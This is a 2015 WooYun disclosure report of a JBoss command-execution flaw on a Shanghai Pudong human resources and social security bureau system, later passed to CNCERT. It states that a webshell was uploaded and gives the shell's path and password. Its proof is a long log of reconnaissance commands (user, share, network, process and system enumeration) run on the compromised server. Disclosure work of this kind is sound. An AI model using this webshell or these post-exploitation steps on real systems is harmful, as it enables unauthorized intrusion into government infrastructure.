当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152578

漏洞标题:浦东新区人力资源和社会保障局某系统getshell

相关厂商:

漏洞作者: 朱元璋

提交时间:2015-11-07 18:16

修复时间:2015-12-26 10:40

公开时间:2015-12-26 10:40

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

浦东新区位于上海市东部,雄踞东海之滨、杭州湾畔,内连扬子江、外眺太平洋,年平均气温16.2℃,四季分明、气候宜人。浦东新区占地约1210多平方公里,常住人口约412万。

详细说明:

系统**.**.**.**:8080/jybz/login.action
地址**.**.**.**:8080存在jboss命令执行漏洞

1.jpg


直接上传木马到服务器

2.jpg


**.**.**.**:8080/yuhkdgfc/test.jsp密码tom

漏洞证明:

[*] 磁盘列表 [ C:D:E:G: ]
C:\jboss-4.2.1.GA\server\default\.\deploy\yuhkdgfc.war\yuhkdgfc\> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
2013 2014 Administrator
ASP.NET ASPNET Guest
HelpAssistant IUSR_HP-C822AAXIS182 IWAM_HP-C822AAXIS182
sql SUPPORT_388945a0 tianle
window window9956
命令运行完毕,但发生一个或多个错误。
系统找不到指定的路径。
C:\jboss-4.2.1.GA\bin\> net share
共享名 资源 注释
-------------------------------------------------------------------------------
IPC$ 远程 IPC
G$ G:\ 默认共享
E$ E:\ 默认共享
ADMIN$ C:\WINDOWS 远程管理
D$ D:\ 默认共享
C$ C:\ 默认共享
back D:\back
zjgl2_bak E:\zjgl2_bak
命令成功完成。
C:\jboss-4.2.1.GA\bin\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\ZJGL1
命令成功完成。
C:\jboss-4.2.1.GA\bin\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 720
TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1041 **.**.**.**:0 LISTENING 496
TCP **.**.**.**:1059 **.**.**.**:0 LISTENING 2152
TCP **.**.**.**:1072 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:1073 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:1074 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:1098 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:1099 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:1521 **.**.**.**:0 LISTENING 2104
TCP **.**.**.**:1990 **.**.**.**:0 LISTENING 1388
TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 1920
TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 4284
TCP **.**.**.**:4444 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:4445 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:4446 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:6368 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:8083 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1060 **.**.**.**:1521 ESTABLISHED 2152
TCP **.**.**.**:1521 **.**.**.**:1060 ESTABLISHED 2104
TCP **.**.**.**:2301 **.**.**.**:0 LISTENING 2552
TCP **.**.**.**:2381 **.**.**.**:0 LISTENING 2552
TCP **.**.**.**:8080 **.**.**.**:47292 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:47376 TIME_WAIT 0
TCP **.**.**.**:8080 **.**.**.**:47754 ESTABLISHED 1740
TCP **.**.**.**:1831 **.**.**.**:3306 ESTABLISHED 1740
TCP **.**.**.**:2301 **.**.**.**:0 LISTENING 2552
TCP **.**.**.**:2381 **.**.**.**:0 LISTENING 2552
TCP **.**.**.**:3306 **.**.**.**:1831 ESTABLISHED 1920
TCP **.**.**.**:3873 **.**.**.**:0 LISTENING 1740
TCP **.**.**.**:5152 **.**.**.**:0 LISTENING 1680
TCP **.**.**.**:8093 **.**.**.**:0 LISTENING 1740
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 720
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1041 [::]:0 LISTENING 496
TCP [::]:1072 [::]:0 LISTENING 1740
TCP [::]:1073 [::]:0 LISTENING 1740
TCP [::]:1074 [::]:0 LISTENING 1740
TCP [::]:1098 [::]:0 LISTENING 1740
TCP [::]:1099 [::]:0 LISTENING 1740
TCP [::]:4444 [::]:0 LISTENING 1740
TCP [::]:4445 [::]:0 LISTENING 1740
TCP [::]:4446 [::]:0 LISTENING 1740
TCP [::]:6368 [::]:0 LISTENING 4
TCP [::]:8009 [::]:0 LISTENING 1740
TCP [::]:8080 [::]:0 LISTENING 1740
TCP [::]:8083 [::]:0 LISTENING 1740
UDP **.**.**.**:161 *:* 2256
UDP **.**.**.**:123 *:* 876
UDP **.**.**.**:137 *:* 4
UDP **.**.**.**:138 *:* 4
UDP **.**.**.**:123 *:* 876
UDP **.**.**.**:1443 *:* 2008
C:\jboss-4.2.1.GA\bin\> net start
已经启动以下 Windows 服务:
Application Experience Lookup Service
Automatic Updates
Bunkna vajmaydj
COM+ Event System
Computer Browser
Cryptographic Services
DbSecuritySpt
DCOM Server Process Launcher
DHCP Client
DNS Client
Event Log
HID Input Service
Hlfxpa stoqrtxn
HP Insight Foundation Agents
HP Insight NIC Agents
HP Insight Server Agents
HP Insight Storage Agents
HP ProLiant Remote Monitor Service
HP ProLiant System Shutdown Service
HP Smart Array SAS/SATA Event Notification Service
HP System Management Homepage
HP Version Control Agent
HTTP SSL
IIS Admin Service
Indexing Service
IPv6 Helper Service
Java Quick Starter
JBoss 4.2.1GA
Logical Disk Manager
MySQL
Network Connections
Network Location Awareness (NLA)
OracleOraHome92TNSListener
OracleServiceORCL
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Rising RavTask Manager
Rising Upgrade Service
Security Accounts Manager
Server
Shell Hardware Detection
SNMP Service
Sogou OmniAddr Update Service
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
TSMReptSvc
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
World Wide Web Publishing Service
命令成功完成。
C:\jboss-4.2.1.GA\bin\> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 332 暂缺
csrss.exe 392 暂缺
winlogon.exe 420 暂缺
services.exe 468 Eventlog, PlugPlay
lsass.exe 496 HTTPFilter, ProtectedStorage, SamSs
svchost.exe 648 DcomLaunch
svchost.exe 720 RpcSs
CCenter.exe 784 暂缺
RavTask.exe 808 RavTask
svchost.exe 836 6to4, Dhcp, Dnscache
svchost.exe 876 LmHosts, W32Time
svchost.exe 932 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, HidServ, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, SENS, ShellHWDetection, winmgmt,
wuauserv, WZCSVC
rsnetsvr.exe 1108 暂缺
spoolsv.exe 1332 Spooler
RavSosSvc.exe 1388 AngelOfDeath
cissesrv.exe 1404 Cissesrv
cisvc.exe 1420 CiSvc
cpqrcmc.exe 1444 CpqRcmc
vcagent.exe 1464 cpqvcagent
DbSecuritySpt.exe 1508 DbSecuritySpt
inetinfo.exe 1636 IISADMIN
jqs.exe 1680 JavaQuickStarterService
JBossService.exe 1740 JBoss 4.2.1GA
mysqld-nt.exe 1920 MySQL
OmniAddrService.exe 2008 OmniAddrService
TNSLSNR.EXE 2104 OracleOraHome92TNSListener
oracle.exe 2152 OracleServiceORCL
snmp.exe 2256 SNMP
sysdown.exe 2332 sysdown
smhstart.exe 2356 SysMgmtHp
hpsmhd.exe 2552 暂缺
rotatelogs.exe 2624 暂缺
rotatelogs.exe 2644 暂缺
tsmreptsvc.exe 2632 TSMReptSvc
hpsmhd.exe 2660 暂缺
rotatelogs.exe 2692 暂缺
rotatelogs.exe 2700 暂缺
Soqeeuq.exe 3776 Wsgqso vmnfdrjw
cpqnimgt.exe 3856 CpqNicMgmt
cqmgserv.exe 3920 CqMgServ
cqmgstor.exe 3932 CqMgStor
svchost.exe 4012 W3SVC
cqmghost.exe 688 CqMgHost
wmiprvse.exe 4192 暂缺
wmiprvse.exe 4224 暂缺
svchost.exe 4284 TermService
cidaemon.exe 4812 暂缺
cidaemon.exe 5616 暂缺
cidaemon.exe 5684 暂缺
logon.scr 4692 暂缺
svchost.exe 5780 TapiSrv
Eugseey.exe 4608 Wsyixe qisuqtqj
cmd.exe 2384 暂缺
tasklist.exe 5104 暂缺
C:\jboss-4.2.1.GA\bin\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : zjgl1
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter
Physical Address. . . . . . . . . : 00-21-5A-C9-86-E8
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
IP Address. . . . . . . . . . . . : fe80::221:5aff:fec9:86e8%4
Default Gateway . . . . . . . . . : **.**.**.**
DNS Servers . . . . . . . . . . . : **.**.**.**
fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : FF-FF-FF-FF-FF-FF-FF-FF
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : fe80::ffff:ffff:fffd%5
Default Gateway . . . . . . . . . :
NetBIOS over Tcpip. . . . . . . . : Disabled
Tunnel adapter Automatic Tunneling Pseudo-Interface:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Automatic Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 0A-F2-09-65
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : fe80::5efe:**.**.**.**%2
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Disabled
C:\jboss-4.2.1.GA\bin\> systeminfo
主机名: ZJGL1
OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: hp
注册的组织:
产品 ID: 69813-640-9510105-45282
初始安装日期: 2008-2-2, 11:51:39
系统启动时间: 3 天 0 小时 26 分 25 秒
系统制造商: HP
系统型号: ProLiant DL380 G5
系统类型: X86-based PC
处理器: 安装了 8 个处理器。
[01]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[02]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[03]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[04]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[05]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[06]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[07]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
[08]: x86 Family 6 Model 23 Stepping 6 GenuineIntel ~2000 Mhz
BIOS 版本: HP - 2
Windows 目录: C:\WINDOWS
系统目录: C:\WINDOWS\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 3,326 MB
可用的物理内存: 2,272 MB
页面文件: 最大值: 5,222 MB
页面文件: 可用: 3,373 MB
页面文件: 使用中: 1,849 MB
页面文件位置: C:\pagefile.sys
域: PDCZ
登录服务器: 暂缺
修补程序: 安装了 312 个修补程序。
[01]: File 1
[02]: File 1
[03]: File 1
[04]: File 1
[05]: File 1
[06]: File 1
[07]: File 1
[08]: File 1
[09]: File 1
[10]: File 1
[11]: File 1
[12]: File 1
[13]: File 1
[14]: File 1
[15]: File 1
[16]: File 1
[17]: File 1
[18]: File 1
[19]: File 1
[20]: File 1
[21]: File 1
[22]: File 1
[23]: File 1
[24]: File 1
[25]: File 1
[26]: File 1
[27]: File 1
[28]: File 1
[29]: File 1
[30]: File 1
[31]: File 1
[32]: File 1
[33]: File 1
[34]: File 1
[35]: File 1
[36]: File 1
[37]: File 1
[38]: File 1
[39]: File 1
[40]: File 1
[41]: File 1
[42]: File 1
[43]: File 1
[44]: File 1
[45]: File 1
[46]: File 1
[47]: File 1
[48]: File 1
[49]: File 1
[50]: File 1
[51]: File 1
[52]: File 1
[53]: File 1
[54]: File 1
[55]: File 1
[56]: File 1
[57]: File 1
[58]: File 1
[59]: File 1
[60]: File 1
[61]: File 1
[62]: File 1
[63]: File 1
[64]: File 1
[65]: File 1
[66]: File 1
[67]: File 1
[68]: File 1
[69]: File 1
[70]: File 1
[71]: File 1
[72]: File 1
[73]: File 1
[74]: File 1
[75]: File 1
[76]: File 1
[77]: File 1
[78]: File 1
[79]: File 1
[80]: File 1
[81]: File 1
[82]: File 1
[83]: File 1
[84]: File 1
[85]: File 1
[86]: File 1
[87]: File 1
[88]: File 1
[89]: File 1
[90]: File 1
[91]: File 1
[92]: File 1
[93]: File 1
[94]: File 1
[95]: File 1
[96]: File 1
[97]: File 1
[98]: File 1
[99]: File 1
[100]: File 1
[101]: File 1
[102]: File 1
[103]: File 1
[104]: File 1
[105]: File 1
[106]: File 1
[107]: File 1
[108]: File 1
[109]: File 1
[110]: File 1
[111]: File 1
[112]: File 1
[113]: File 1
[114]: File 1
[115]: File 1
[116]: File 1
[117]: File 1
[118]: File 1
[119]: File 1
[120]: File 1
[121]: File 1
[122]: File 1
[123]: File 1
[124]: File 1
[125]: File 1
[126]: File 1
[127]: File 1
[128]: File 1
[129]: File 1
[130]: File 1
[131]: File 1
[132]: File 1
[133]: File 1
[134]: File 1
[135]: File 1
[136]: File 1
[137]: File 1
[138]: File 1
[139]: File 1
[140]: File 1
[141]: File 1
[142]: File 1
[143]: File 1
[144]: File 1
[145]: File 1
[146]: File 1
[147]: File 1
[148]: File 1
[149]: File 1
[150]: File 1
[151]: Q147222
[152]: KB2604078 - QFE
[153]: KB2656358 - QFE
[154]: KB2656376 - QFE
[155]: KB2656376-v2 - QFE
[156]: KB2698032 - QFE
[157]: KB2742604 - QFE
[158]: KB933854 - QFE
[159]: KB979907 - QFE
[160]: SP1 - SP
[161]: KB975558_WM8
[162]: KB925398_WMP64
[163]: KB2564958 - Update
[164]: KB914961 - Service Pack
[165]: KB2079403 - Update
[166]: KB2115168 - Update
[167]: KB2229593 - Update
[168]: KB2296011 - Update
[169]: KB2347290 - Update
[170]: KB2360937 - Update
[171]: KB2378111 - Update
[172]: KB2387149 - Update
[173]: KB2419635 - Update
[174]: KB2423089 - Update
[175]: KB2440591 - Update
[176]: KB2443105 - Update
[177]: KB2476490 - Update
[178]: KB2478960 - Update
[179]: KB2478971 - Update
[180]: KB2483185 - Update
[181]: KB2485663 - Update
[182]: KB2506212 - Update
[183]: KB2507618 - Update
[184]: KB2507938 - Update
[185]: KB2508429 - Update
[186]: KB2509553 - Update
[187]: KB2510587 - Update
[188]: KB2524375 - Update
[189]: KB2535512 - Update
[190]: KB2536276-v2 - Update
[191]: KB2544521 - Update
[192]: KB2544893-v2 - Update
[193]: KB2562937 - Update
[194]: KB2566454 - Update
[195]: KB2570947 - Update
[196]: KB2584146 - Update
[197]: KB2585542 - Update
[198]: KB2598479 - Update
[199]: KB2603381 - Update
[200]: KB2604078 - Update
[201]: KB2618451 - Update
[202]: KB2620712 - Update
[203]: KB2621440 - Update
[204]: KB2624667 - Update
[205]: KB2631813 - Update
[206]: KB2633171 - Update
[207]: KB2638806 - Update
[208]: KB2641690-v2 - Update
[209]: KB2644615 - Update
[210]: KB2646524 - Update
[211]: KB2647518 - Update
[212]: KB2653956 - Update
[213]: KB2656358 - Update
[214]: KB2656376 - Update
[215]: KB2656376-v2 - Update
[216]: KB2659262 - Update
[217]: KB2675157 - Update
[218]: KB2676562 - Update
[219]: KB2685939 - Update
[220]: KB2691442 - Update
[221]: KB2695962 - Update
[222]: KB2698032 - Update
[223]: KB2698365 - Update
[224]: KB2699988 - Update
[225]: KB2705219 - Update
[226]: KB2705219-v2 - Update
[227]: KB2707511 - Update
[228]: KB2709162 - Update
[229]: KB2712808 - Update
[230]: KB2718523 - Update
[231]: KB2718704 - Update
[232]:
网卡: 安装了 1 个 NIC。
[01]: HP NC373i Multifunction Gigabit Server Adapter
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: **.**.**.**
C:\jboss-4.2.1.GA\bin\>

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-11 10:38

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价